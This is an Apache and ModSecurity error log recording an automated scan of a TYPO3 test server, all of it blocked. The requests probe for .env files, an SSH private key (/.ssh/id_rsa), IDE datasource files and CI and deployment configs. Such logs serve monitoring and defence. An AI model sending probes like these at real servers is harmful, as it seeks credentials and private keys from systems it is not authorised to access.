[Mon Sep 30 03:12:39.567807 2024] [:error] [pid 2292827] [client 45.135.232.70:51240] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.www"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.www"] [unique_id "Zvn7B6ppUB6RwzyOV3GHmAAAAAA"]
[Mon Sep 30 03:12:39.568142 2024] [:error] [pid 2292827] [client 45.135.232.70:51240] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.www"] [unique_id "Zvn7B6ppUB6RwzyOV3GHmAAAAAA"]
[Mon Sep 30 03:12:39.568385 2024] [:error] [pid 2292827] [client 45.135.232.70:51240] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.www"] [unique_id "Zvn7B6ppUB6RwzyOV3GHmAAAAAA"]
[Mon Sep 30 03:12:39.568692 2024] [authz_core:error] [pid 2292831] [client 45.135.232.70:51252] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.621026 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:51306] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.632255 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:51382] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.656687 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:51390] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.664132 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:51404] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.672264 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:51426] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.675662 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:51418] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.683036 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:51438] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.684218 2024] [authz_core:error] [pid 2292831] [client 45.135.232.70:51432] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.728184 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:51462] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.733594 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:51450] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.764047 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:51464] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.772265 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:51492] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.774012 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:51478] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.788421 2024] [authz_core:error] [pid 2292831] [client 45.135.232.70:51524] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.golangci.yaml
[Mon Sep 30 03:12:39.792189 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:51508] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Mon Sep 30 03:12:39.828198 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:51540] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.golangci.yml
[Mon Sep 30 03:12:39.828404 2024] [authz_core:error] [pid 2293064] [client 45.135.232.70:51544] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htaccess
[Mon Sep 30 03:12:39.831363 2024] [:error] [pid 2292830] [client 45.135.232.70:51552] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".idea" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .idea found within REQUEST_FILENAME: /.idea/datasources.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.idea/dataSources.xml"] [unique_id "Zvn7B2NuTcAsKB-5zCITzQAAAAM"]
[Mon Sep 30 03:12:39.831698 2024] [:error] [pid 2292830] [client 45.135.232.70:51552] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.idea/dataSources.xml"] [unique_id "Zvn7B2NuTcAsKB-5zCITzQAAAAM"]
[Mon Sep 30 03:12:39.831928 2024] [:error] [pid 2292830] [client 45.135.232.70:51552] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.idea/dataSources.xml"] [unique_id "Zvn7B2NuTcAsKB-5zCITzQAAAAM"]
[Mon Sep 30 03:12:39.869187 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:51598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.scrutinizer.yml
[Mon Sep 30 03:12:39.892489 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:51578] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.phpspec.yml
[Mon Sep 30 03:12:39.894411 2024] [authz_core:error] [pid 2292831] [client 45.135.232.70:51594] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.rubocop.yml
[Mon Sep 30 03:12:39.900001 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:51584] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.pre-commit-config.yaml
[Mon Sep 30 03:12:39.900406 2024] [:error] [pid 2292827] [client 45.135.232.70:51604] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Zvn7B6ppUB6RwzyOV3GHmwAAAAA"]
[Mon Sep 30 03:12:39.901067 2024] [:error] [pid 2292827] [client 45.135.232.70:51604] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Zvn7B6ppUB6RwzyOV3GHmwAAAAA"]
[Mon Sep 30 03:12:39.901479 2024] [:error] [pid 2292827] [client 45.135.232.70:51604] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/id_rsa"] [unique_id "Zvn7B6ppUB6RwzyOV3GHmwAAAAA"]
[Mon Sep 30 03:12:39.928107 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:51614] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml
[Mon Sep 30 03:12:40.012010 2024] [:error] [pid 2292831] [client 45.135.232.70:51662] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/gruntfile.js" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /gruntfile.js found within REQUEST_FILENAME: /gruntfile.js"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/Gruntfile.js"] [unique_id "Zvn7CKb0PnYyMP2Lu2ExuwAAAAQ"]
[Mon Sep 30 03:12:40.012234 2024] [:error] [pid 2292831] [client 45.135.232.70:51662] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Gruntfile.js"] [unique_id "Zvn7CKb0PnYyMP2Lu2ExuwAAAAQ"]
[Mon Sep 30 03:12:40.012416 2024] [:error] [pid 2292831] [client 45.135.232.70:51662] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Gruntfile.js"] [unique_id "Zvn7CKb0PnYyMP2Lu2ExuwAAAAQ"]
[Mon Sep 30 03:12:40.016547 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:51692] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/Partners
[Mon Sep 30 03:12:40.087015 2024] [authz_core:error] [pid 2293064] [client 45.135.232.70:51750] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/airflow.cfg
[Mon Sep 30 03:12:40.107094 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:51734] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/admin
[Mon Sep 30 03:12:40.121241 2024] [authz_core:error] [pid 2292831] [client 45.135.232.70:51756] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible.cfg
[Mon Sep 30 03:12:40.125479 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:51772] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Mon Sep 30 03:12:40.130855 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:51762] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Mon Sep 30 03:12:40.152148 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:51802] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Mon Sep 30 03:12:40.162386 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:51770] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Mon Sep 30 03:12:40.191962 2024] [authz_core:error] [pid 2293064] [client 45.135.232.70:51806] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Mon Sep 30 03:12:40.219762 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:51780] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Mon Sep 30 03:12:40.226463 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:51786] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Mon Sep 30 03:12:40.229787 2024] [authz_core:error] [pid 2292831] [client 45.135.232.70:51834] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/apache.conf
[Mon Sep 30 03:12:40.235756 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:51824] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Mon Sep 30 03:12:40.238710 2024] [:error] [pid 2292827] [client 45.135.232.70:51844] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Zvn7CKppUB6RwzyOV3GHngAAAAA"]
[Mon Sep 30 03:12:40.239096 2024] [:error] [pid 2292827] [client 45.135.232.70:51844] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Zvn7CKppUB6RwzyOV3GHngAAAAA"]
[Mon Sep 30 03:12:40.239357 2024] [:error] [pid 2292827] [client 45.135.232.70:51844] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Zvn7CKppUB6RwzyOV3GHngAAAAA"]
[Mon Sep 30 03:12:40.239430 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:51814] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ansible
[Mon Sep 30 03:12:40.252490 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:51860] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Mon Sep 30 03:12:40.280735 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:51848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Mon Sep 30 03:12:40.329605 2024] [:error] [pid 2292852] [client 45.135.232.70:51868] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/config/.env"] [unique_id "Zvn7CNyjaeShYxtARZtiXQAAAAU"]
[Mon Sep 30 03:12:40.329944 2024] [:error] [pid 2292852] [client 45.135.232.70:51868] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/config/.env"] [unique_id "Zvn7CNyjaeShYxtARZtiXQAAAAU"]
[Mon Sep 30 03:12:40.330160 2024] [:error] [pid 2292852] [client 45.135.232.70:51868] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/config/.env"] [unique_id "Zvn7CNyjaeShYxtARZtiXQAAAAU"]
[Mon Sep 30 03:12:40.330919 2024] [authz_core:error] [pid 2292831] [client 45.135.232.70:51878] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Mon Sep 30 03:12:40.349907 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:51880] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Mon Sep 30 03:12:40.358380 2024] [:error] [pid 2293063] [client 45.135.232.70:51918] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/user/v1/secrets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/user/v1/secrets/.env"] [unique_id "Zvn7CKftDAs9z02W9bMAbQAAAAg"]
[Mon Sep 30 03:12:40.358622 2024] [:error] [pid 2293063] [client 45.135.232.70:51918] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/user/v1/secrets/.env"] [unique_id "Zvn7CKftDAs9z02W9bMAbQAAAAg"]
[Mon Sep 30 03:12:40.358785 2024] [:error] [pid 2293063] [client 45.135.232.70:51918] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/user/v1/secrets/.env"] [unique_id "Zvn7CKftDAs9z02W9bMAbQAAAAg"]
[Mon Sep 30 03:12:40.392436 2024] [:error] [pid 2292829] [client 45.135.232.70:51946] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/config/.env"] [unique_id "Zvn7CFEYK8s8ohUI_TBIpwAAAAI"]
[Mon Sep 30 03:12:40.392769 2024] [:error] [pid 2292829] [client 45.135.232.70:51946] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/config/.env"] [unique_id "Zvn7CFEYK8s8ohUI_TBIpwAAAAI"]
[Mon Sep 30 03:12:40.394069 2024] [:error] [pid 2292829] [client 45.135.232.70:51946] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/config/.env"] [unique_id "Zvn7CFEYK8s8ohUI_TBIpwAAAAI"]
[Mon Sep 30 03:12:40.422038 2024] [:error] [pid 2293064] [client 45.135.232.70:51922] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Zvn7CPlRPa8kw2k9ENXZYgAAAAk"]
[Mon Sep 30 03:12:40.422499 2024] [:error] [pid 2293064] [client 45.135.232.70:51922] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Zvn7CPlRPa8kw2k9ENXZYgAAAAk"]
[Mon Sep 30 03:12:40.422806 2024] [:error] [pid 2293064] [client 45.135.232.70:51922] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v1/.env"] [unique_id "Zvn7CPlRPa8kw2k9ENXZYgAAAAk"]
[Mon Sep 30 03:12:40.454207 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:52050] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Mon Sep 30 03:12:40.489231 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:52186] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/appspec.yml
[Mon Sep 30 03:12:40.526322 2024] [authz_core:error] [pid 2293064] [client 45.135.232.70:52534] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ci
[Mon Sep 30 03:12:40.546302 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:52560] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/circleci
[Mon Sep 30 03:12:40.598111 2024] [:error] [pid 2293061] [client 45.135.232.70:52010] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "Zvn7CP4plfEpgwUkwScOdAAAAAc"]
[Mon Sep 30 03:12:40.598448 2024] [:error] [pid 2293061] [client 45.135.232.70:52010] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "Zvn7CP4plfEpgwUkwScOdAAAAAc"]
